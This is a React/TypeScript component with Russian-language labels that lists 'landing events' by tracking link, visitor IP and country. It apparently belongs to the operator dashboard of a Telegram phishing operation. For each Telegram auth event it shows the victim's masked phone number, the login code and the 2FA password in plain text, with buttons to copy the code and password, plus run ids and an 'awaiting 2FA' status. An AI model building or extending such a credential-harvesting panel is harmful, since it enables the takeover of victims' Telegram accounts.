import { Button } from '@/components/ui/button';
import type { ILandingEvent } from '@/entities/landing.entity';
import { LANDING_EVENT_TYPE_LABELS } from '@/entities/landing.entity';
import { formatLandingCountryLabel } from '@/lib/landing-country';
import {
	formatLandingEventMetaDetail,
	getLandingEventOutcomeBadge,
	parseTelegramAuthEventMeta,
} from '@/lib/format-landing-event-meta';
import { cn } from '@/lib/utils';
import { CopyIcon } from 'lucide-react';

interface LandingEventRowProps {
	event: ILandingEvent;
}

const OUTCOME_LABELS: Record<string, string> = {
	success: 'Успех',
	error: 'Ошибка',
	neutral: '—',
	pending: 'В процессе',
};

function outcomeBadgeClass(outcome: ReturnType<typeof getLandingEventOutcomeBadge>): string {
	if (outcome === 'success') return 'bg-chart-2/15 text-chart-2 border-chart-2/30';
	if (outcome === 'error') return 'bg-destructive/10 text-destructive border-destructive/30';
	return 'bg-muted text-muted-foreground border-border';
}

async function copyText(value: string) {
	try {
		await navigator.clipboard.writeText(value);
	} catch {
		// ignore
	}
}

export default function LandingEventRow({ event }: LandingEventRowProps) {
	const outcome = getLandingEventOutcomeBadge(event);
	const parsed = parseTelegramAuthEventMeta(event);
	const metaDetail = formatLandingEventMetaDetail(event);

	return (
		<div className='rounded-lg border border-border px-3 py-2 text-sm'>
			<div className='flex items-center justify-between gap-2 flex-wrap'>
				<div className='flex items-center gap-2 min-w-0'>
					<span className='font-medium'>{LANDING_EVENT_TYPE_LABELS[event.type]}</span>
					<span className={cn('inline-flex rounded-md border text-[10px] px-1.5 py-0.5', outcomeBadgeClass(outcome))}>
						{OUTCOME_LABELS[outcome]}
					</span>
				</div>
				<span className='text-xs text-muted-foreground shrink-0'>
					{new Date(event.createdAt).toLocaleString('ru-RU')}
				</span>
			</div>
			<p className='text-xs text-muted-foreground mt-1'>
				Link: {event.linkId}
				{event.ip ? ` · IP: ${event.ip}` : ''}
				{event.countryCode ? ` · ${formatLandingCountryLabel(event.countryCode)}` : ''}
			</p>
			{parsed ? (
				<div className='mt-2 grid gap-1 text-xs'>
					{parsed.phoneMasked ? <span>Тел: {parsed.phoneMasked}</span> : null}
					{parsed.code ? (
						<div className='flex items-center gap-2'>
							<span className='font-mono'>Код: {parsed.code}</span>
							<Button type='button' variant='ghost' size='icon' className='h-6 w-6' onClick={() => void copyText(parsed.code!)}>
								<CopyIcon size={12} />
							</Button>
						</div>
					) : null}
					{parsed.password ? (
						<div className='flex items-center gap-2'>
							<span className='font-mono'>2FA: {parsed.password}</span>
							<Button
								type='button'
								variant='ghost'
								size='icon'
								className='h-6 w-6'
								onClick={() => void copyText(parsed.password!)}
							>
								<CopyIcon size={12} />
							</Button>
						</div>
					) : null}
					{parsed.runId ? <span className='font-mono'>run: {parsed.runId}</span> : null}
					{parsed.error ? <span className='text-destructive'>{parsed.error}</span> : null}
					{parsed.awaitingPassword ? <span>Нужен 2FA</span> : null}
				</div>
			) : metaDetail ? (
				<p className='text-xs font-mono mt-1 break-all text-foreground/90'>{metaDetail}</p>
			) : null}
		</div>
	);
}
